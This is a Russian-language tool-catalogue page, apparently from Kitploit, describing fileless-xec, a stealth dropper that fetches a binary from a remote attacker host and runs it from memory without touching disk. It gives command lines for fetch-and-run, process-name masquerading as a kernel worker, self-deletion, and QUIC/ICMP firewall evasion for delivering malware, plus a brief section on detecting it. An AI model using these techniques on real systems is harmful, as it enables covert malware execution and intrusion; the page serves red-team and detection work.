Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
fileless-xec — Стелс-дроппер, выполняющий удаленные бинарные файлы без сохранения их на диск .(поддержка HTTP3, поддержка ICMP, невидимые следы, кроссплатформенность,...) | Kitploit
Инструменты/GitHubGitHub/ariary/fileless-xec
Генерация полезной нагрузкиЭксплуатацияОбход IDS/IPSПост-эксплуатацияОбход WAFТестирование на ПроникновениеКомандование и УправлениеRed TeamingИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubariary/fileless-xec
2094262 лет назадПроверено Kitploit

fileless-xec

Стелс-дроппер, выполняющий удаленные бинарные файлы без сохранения их на диск .(поддержка HTTP3, поддержка ICMP, невидимые следы, кроссплатформенность,...)

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

➲ fileless-xec 🦜

👋 Certainly useful , mainly for fun, rougly inspired by 0x00 article

Использование в пентесте: fileless-xec используется на целевой машине для скрытого выполнения бинарного файла, расположенного на машине атакующего

➲ Краткое описание

fileless-xec позволяет выполнить удаленный бинарный файл на локальной машине прямо из памяти, не сохраняя его на диск

➪ Установка

  • простое использование fileless-xec [binary_url] (~curl | sh для бинарных файлов)
  • выполнить бинарный файл с указанным именем программы: fileless-xec -n /usr/sbin/sshd [binary_url]
  • отделить выполнение программы от tty: fileless-xec --setsid [...]
  • demo

    Объяснение Мы хотим локально выполнить бинарный файл `writeNsleep`, расположенный на удаленной машине. Сначала мы запускаем python http сервер на удаленной машине. Локально мы используем `fileless-xec` и выставляем имя `/usr/sbin/sshd` для выполнения бинарного файла `writeNsleep` (для скрытности и развлечения). Как только `writeNsleep` запускается, `fileless-xec` удаляет себя (`--self-remove`)

    Другие варианты использования

    • Выполнение бинарного файла с stdout/stdin
    • Выполнение бинарного файла с аргументами
    • Самоудаление fileless-xec
    • Обход сетевых ограничений с помощью ICMP
    • Обход брандмауэра с помощью HTTP3
    • "Удаленный go": выполнение go-бинарных файлов без установки go локально
    • Выполнение shell-скрипта
    • Режим сервера fileless-xec
      • Сценарий RAT (троян удаленного доступа)
    • fileless-xec на Windows

    ➲ История скрытности

    • Бинарный файл не отображается в файловой системе хоста
    • Имя выполняемой программы может быть настраиваемым
    • Обход брандмауэра третьего поколения возможен с поддержкой http3
    • fileless-xec самоудаляется после запуска

    memfd_create

    Удаленный бинарный файл сохраняется локально с помощью системного вызова memfd_create, который хранит его в memory disk, не отображаемом в файловой системе (т.е. вы не можете найти его с помощью ls).

    Примечание: системный вызов memfd_create не существует для macOS.

    fexecve

    Затем мы выполняем его с помощью системного вызова fexecve (так как он в настоящее время не предоставляется библиотекой syscall в golang, мы реализуем его).

    С помощью fexecve мы можем выполнить программу, но ссылаемся на программу для запуска, используя файловый дескриптор, а не полный путь.

    HTTP3/QUIC

    Включите его с помощью флага -Q/http3.
    Вы можете настроить легкий веб-сервер rootfs, поддерживающий http3, запустив go run ./test/http3/light-server.go -p LISTENING PORT (Это http3-эквивалент python3 -m http.server )
    используйте test/http3/genkey.sh для генерации сертификата и ключа.

    QUIC UDP, также известный как http3, — это протокол Интернета нового поколения, который ускоряет работу онлайн-веб-приложений, чувствительных к задержкам, таких как поиск, потоковое видео и т.д., за счет сокращения времени кругового пути (RTT), необходимого для подключения к серверу. Поскольку QUIC использует собственное шифрование, эквивалентное TLS (это изменится в будущем со стандартизированной версией), брандмауэры третьего поколения, обеспечивающие контроль и видимость приложений, сталкиваются с трудностями при контроле и мониторинге трафика QUIC.

    Если вы используете fileless-xec в качестве дроппера (Только для тестирования или с разрешения), вы, вероятно, захотите выполнить какие-либо вредоносные программы или другие файлы, которые могут быть перехвачены при анализе пакетов. Следовательно, с включенным QUIC вы можете обойти анализ пакетов и загрузить вредоносное ПО.

    Кроме того, в случае, если брандмауэр используется только для разрешения/блокировки трафика, может случиться так, что правила брандмауэра забывают про протокол UDP, что позволяет вашим запросам оставаться незамеченными

    другие навыки для скрытности

    Хотя программа не присутствует на диске памяти, запущенную программу все еще можно обнаружить с помощью команды ps, например.

    1. Замаскировать следы с помощью поддельного имени программы

    fileless-xec --name <fake_name> <binary_raw_url> по умолчанию имя — [kworker/u:0]

    1. Отделиться от tty, чтобы имитировать поведение демон-процесса

    fileless-xec --setsid <binary_raw_url>.

    Предостережения

    Вы все еще можете быть обнаружены с помощью:

    root@kitploit:~
    $ lsof | grep memfd
    

    Или также opensnoop (но не execsnoop)

    Или профиль seccomp, аудит системного вызова execve (но это очень нагружает, так как команда sleep также использует execve, например)

    Скачать инструмент